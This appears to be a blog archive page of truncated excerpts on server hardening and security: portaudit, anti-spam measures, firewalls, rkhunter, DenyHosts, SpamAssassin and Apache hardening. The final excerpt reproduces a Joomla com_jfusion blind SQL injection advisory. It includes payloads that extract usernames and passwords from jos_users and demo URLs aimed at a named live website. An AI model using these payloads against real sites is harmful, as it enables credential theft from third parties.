This is new nifty and long term demanded feature in FreeBSD. A port called portaudit provides a system to check if installed ports are listed in a database of published security vulnerabilities. After installation it will update this security database automatically and include its reports in the output of the daily security run. If you [...]

Spam is a nuisance, and as bloggers, we have all experienced a flood of spam every now and then. Not only is it a pain, but it can slow down your blog and use up your resources. In this post we’ll look at ten ways to combat spam. 1. Install Akismet This is the simple [...]

1.) Firewall Installation Installing firewall and various other related tools such as CSF, sim. These will prevent unauthorized access to your server and from brute force attacks. CSF (ConfigServer Firewall) http://www.configserver.com/free/csf/install.txt SIM (System Integrity Monitor) http://www.rfxnetworks.com/sim.php NSIV (Network Socket Inode Validation) http://www.rfxnetworks.com/nsiv.php LES (Linux Environment Security) http://www.rfxnetworks.com/les.php these do not prevent exploits of services which [...]

I. VULNERABILITY WordPress <= 2.8.3 Remote admin reset password II. BACKGROUND WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it. [...]

Securing Your Server Below given are some of the steps that can be used to secure your server. Disable identification output for Apache To disable the version output for proftp, SSH into server and login as root. At command prompt type: pico /etc/httpd/conf/httpd.conf Scroll (way) down and change the following line to ServerSignature Off Restart [...]

Here are some basic steps to secure Apache Web Server IMPORTANT NOTE: These suggestions may vary from server to server and modify the values as per your server configurations. It is up to you to determine if any of the changes suggested here are not compatible with your requirements. 1. Hide the Apache Version number, [...]

Download the gzipped tarball, extract it and run the installation script. download: # wget http://downloads.rootkit.nl/rkhunter-<version>.tar.gz Note: It doesn’t matter where you save the tarball extract: # tar zxf rkhunter-<version>.tar.gz installation: # cd rkhunter # ./installer.sh (Source: http://www.evolution-security.com/) (Source: http://www.rootkit.nl/articles/rootkit_hunter_faq.html) Incoming search terms:install rootkit hunter cpanel (1)remove rootkit from cpanel centos (1)Root kit hunter for wordpress [...]

8 Install Razor, Pyzor And DCC And Configure SpamAssassin Razor, Pyzor and DCC are spamfilters that use a collaborative filtering network. To install them, run apt-get install razor pyzor dcc-client Now we have to tell SpamAssassin to use these three programs. Edit /etc/spamassassin/local.cf so that it looks like this: # This is the right place [...]

Version 1.0 Author: Falko Timme <ft [at] falkotimme [dot] com> Last edited: 02/07/2006 In this HowTo I will show how to install and configure DenyHosts. DenyHosts is a tool that observes login attempts to SSH, and if it finds failed login attempts again and again from the same IP address, DenyHosts blocks further login attempts [...]

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Vulnerability : Blind SQL injection ################################################### Example: http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid Sql code: +and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/* +and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* etc, etc… DEMO LIVE: http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1 http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97 !False ¡¡¡¡ http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98 ¡True ¡¡¡¡ etc, etc…. I let a script that could [...]